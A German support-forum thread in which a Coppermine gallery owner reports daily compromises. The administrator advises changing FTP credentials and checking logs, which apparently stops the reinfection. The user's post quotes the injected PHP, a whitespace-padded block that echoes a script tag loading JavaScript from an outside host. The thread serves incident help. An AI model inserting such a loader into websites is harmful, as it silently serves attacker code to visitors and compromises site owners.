Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Hack  (Read 3121 times)

0 Members and 1 Guest are viewing this topic.

impaxx

  • Guest
Hack
« on: May 22, 2014, 09:01:39 pm »

Hallo

ich habe Copermine 1.5.28.

Leider wird meine Seite jeden Tag gehackt.

Was kann ich dagegen machen?

Fehlermeldung beim Aufruf der Seite ist Parse error: syntax error, unexpected '=', expecting '}' in /home/.sites/660/site1150/web/galerie/index.php on line 404


www.indeo-clan.at/galerie

Dieser Code wurde in der index.php eingetragen

Code: [Select]
<?php
#06a770#
                                                                                                                                                                                                                                 
if(empty($yw)) {$yw "<script type=\"text/javascript\" src=\"http://kylie.org.uk/menu/clik.php?id=12622387\"></script>";echo $yw;}
#/06a770#
?>

<?php

?>

<?php

Es wurden auch im Ordner js alle Files geändert.

Wenn ich alles neu aufspiele funktioniert die Seite wieder, aber das dauert nur wenige Stunden und der Code ist wieder eingetragen aber immer ein anderer.

Bitte um Hilfe

Danke

lg impaxx

Logged

Αndré

  • Administrator
  • Coppermine addict
  • ****
  • Country: de
  • Offline Offline
  • Gender: Male
  • Posts: 15764
Re: Hack
« Reply #1 on: June 16, 2014, 11:39:20 am »

Das muss nicht unbedingt ein Sicherheitsproblem bei Coppermine sein. Ich würde als erstes die FTP-Zugangsdaten ändern. Falls es immer noch passiert, würde ich ein Blick in die Log-Dateien deines Server werfen, ob irgendein Coppermine-fremdes Skript aufgerufen wird.

Läuft auf deinem Server noch andere Software (Joomla, Wordpress, Forum, etc. pp.)? Hast du Plugins in Coppermine installiert oder Modifikationen vorgenommen?
Logged

impaxx

  • Guest
Re: Hack
« Reply #2 on: June 17, 2014, 04:25:20 pm »

Hy,

ich habe die Zugangsdaten geändert.

Bis jetzt passt alles.

lg
Logged
Pages: [1]   Go Up
 

Page created in 0.019 seconds with 20 queries.